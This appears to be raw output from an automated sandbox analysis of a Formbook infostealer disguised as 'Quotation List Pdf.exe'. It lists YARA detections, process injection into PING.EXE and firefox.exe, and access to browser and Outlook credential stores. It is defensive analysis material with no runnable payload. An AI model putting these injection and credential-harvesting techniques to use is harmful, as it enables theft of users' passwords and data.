            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882E80 NtReadVirtualMemory,7_2_03882E80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882EA0 NtAdjustPrivilegesToken,7_2_03882EA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882E30 NtWriteVirtualMemory,7_2_03882E30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882DB0 NtEnumerateKey,7_2_03882DB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882D00 NtSetInformationFile,7_2_03882D00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03883D10 NtOpenProcessToken,7_2_03883D10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03883D70 NtOpenThread,7_2_03883D70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882CC0 NtQueryVirtualMemory,7_2_03882CC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882CF0 NtOpenProcess,7_2_03882CF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882C00 NtQueryInformationProcess,7_2_03882C00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A8000 NtClose,7_2_030A8000
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A7F60 NtDeleteFile,7_2_030A7F60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A7E70 NtReadFile,7_2_030A7E70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A7D10 NtCreateFile,7_2_030A7D10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038529A07_2_038529A0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0391A9A67_2_0391A9A6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038599507_2_03859950
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0386B9507_2_0386B950
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038669627_2_03866962
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038368B87_2_038368B8
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038538E07_2_038538E0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0387E8F07_2_0387E8F0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038528407_2_03852840
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0385A8407_2_0385A840
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03851F927_2_03851F92
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390FFB17_2_0390FFB1
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03842FC87_2_03842FC8
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03813FD27_2_03813FD2
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03813FD57_2_03813FD5
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0385CFE07_2_0385CFE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390FF097_2_0390FF09
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03892F287_2_03892F28
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03870F307_2_03870F30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038C4F407_2_038C4F40
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390CE937_2_0390CE93
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03862E907_2_03862E90
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03859EB07_2_03859EB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390EEDB7_2_0390EEDB
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390EE267_2_0390EE26
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03850E597_2_03850E59
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03868DBF7_2_03868DBF
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0386FDC07_2_0386FDC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0384ADE07_2_0384ADE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0385AD007_2_0385AD00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03853D407_2_03853D40
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03901D5A7_2_03901D5A
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03907D737_2_03907D73
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038F0CB57_2_038F0CB5
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390FCF27_2_0390FCF2
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03840CF27_2_03840CF2
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03850C007_2_03850C00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038C9C327_2_038C9C32
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030918D07_2_030918D0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030934307_2_03093430
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030AA4507_2_030AA450
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0308CA977_2_0308CA97
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0308CAA07_2_0308CAA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0308AD407_2_0308AD40
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0308CCC07_2_0308CCC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366BBC37_2_0366BBC3
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366BAA57_2_0366BAA5
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366BF5C7_2_0366BF5C
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366AFC87_2_0366AFC8
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0366BD2B7_2_0366BD2B
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: String function: 00007FF76843DBD0 appears 64 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 0383B970 appears 266 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 038CF290 appears 105 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 03885130 appears 36 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 03897E54 appears 88 times
            Source: C:\Windows\SysWOW64\PING.EXECode function: String function: 038BEA12 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0588EA12 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0580B970 appears 266 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0589F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05855130 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05867E54 appears 88 times
            Source: Quotation List Pdf.exe Binary or memory string: OriginalFilename vs Quotation List Pdf.exe
            Source: Quotation List Pdf.exe, 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameActivityIdthrowOnEndOfStream.dllZ vs Quotation List Pdf.exe
            Source: Quotation List Pdf.exe Binary or memory string: OriginalFilenameActivityIdthrowOnEndOfStream.dllZ vs Quotation List Pdf.exe
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Quotation List Pdf.exe Static PE information: Section: .rsrc ZLIB complexity 0.9967180198598131
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/1@12/10
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768442F60 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma, 0_2_00007FF768442F60
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
            Source: C:\Windows\SysWOW64\PING.EXE File created: C:\Users\user\AppData\Local\Temp\y870G2JOQ
            Source: Quotation List Pdf.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: PING.EXE, 00000007.00000002.3297913979.0000000003184000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1738191649.0000000003136000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1738319140.0000000003156000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3297913979.0000000003156000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1740582907.0000000003160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Quotation List Pdf.exe ReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe File read: C:\Users\user\Desktop\Quotation List Pdf.exe
            Source: unknown Process created: C:\Users\user\Desktop\Quotation List Pdf.exe "C:\Users\user\Desktop\Quotation List Pdf.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: C:\Windows\SysWOW64\PING.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: version.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\PING.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Quotation List Pdf.exe Static PE information: Image base 0x140000000 > 0x60000000
            Source: Quotation List Pdf.exe Static file information: File size 2404352 > 1048576
            Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Quotation List Pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Quotation List Pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tiwTBKVufjvhPL.exe, 00000006.00000002.3297786595.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624296324.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ping.pdbGCTL source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: vbc.pdb source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: ping.pdb source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Quotation List Pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: Quotation List Pdf.exe Static PE information: section name: .managed
            Source: Quotation List Pdf.exe Static PE information: section name: hydrated
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00418865 push 9C409E68h; retf 5_2_004188A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00411812 push ecx; iretd 5_2_00411815
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004141BD push edx; retn A625h5_2_004141E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00406A65 push cs; ret 5_2_00406A66
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00403320 push eax; ret 5_2_00403322
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00408320 pushfd ; ret 5_2_0040832B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004083A0 pushfd ; iretd 5_2_004083CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041EDE3 push esp; retf 5_2_0041EE5D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00401609 push ss; ret 5_2_0040160A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041875E pushad ; ret 5_2_0041877A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00418703 pushad ; ret 5_2_0041877A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058109AD push ecx; mov dword ptr [esp], ecx5_2_058109B6
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043C7C75 push cs; ret 6_2_043C7C76
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043C9530 pushfd ; ret 6_2_043C953B
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043C95B0 pushfd ; iretd 6_2_043C95DC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043DF789 push es; retf 6_2_043DF7A2
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043DFFF3 push esp; retf 6_2_043E006D
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043E0038 push esp; retf 6_2_043E006D
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043E00E3 push edi; ret 6_2_043E00EB
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D9913 pushad ; ret 6_2_043D998A
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D996E pushad ; ret 6_2_043D998A
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D2A22 push ecx; iretd 6_2_043D2A25
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D9A75 push 9C409E68h; retf 6_2_043D9AB3
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03811200 push eax; iretd 7_2_03811369
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0381225F pushad ; ret 7_2_038127F9
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0381B008 push es; iretd 7_2_0381B009
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038127FA pushad ; ret 7_2_038127F9
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038409AD push ecx; mov dword ptr [esp], ecx7_2_038409B6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03819939 push es; iretd 7_2_03819940
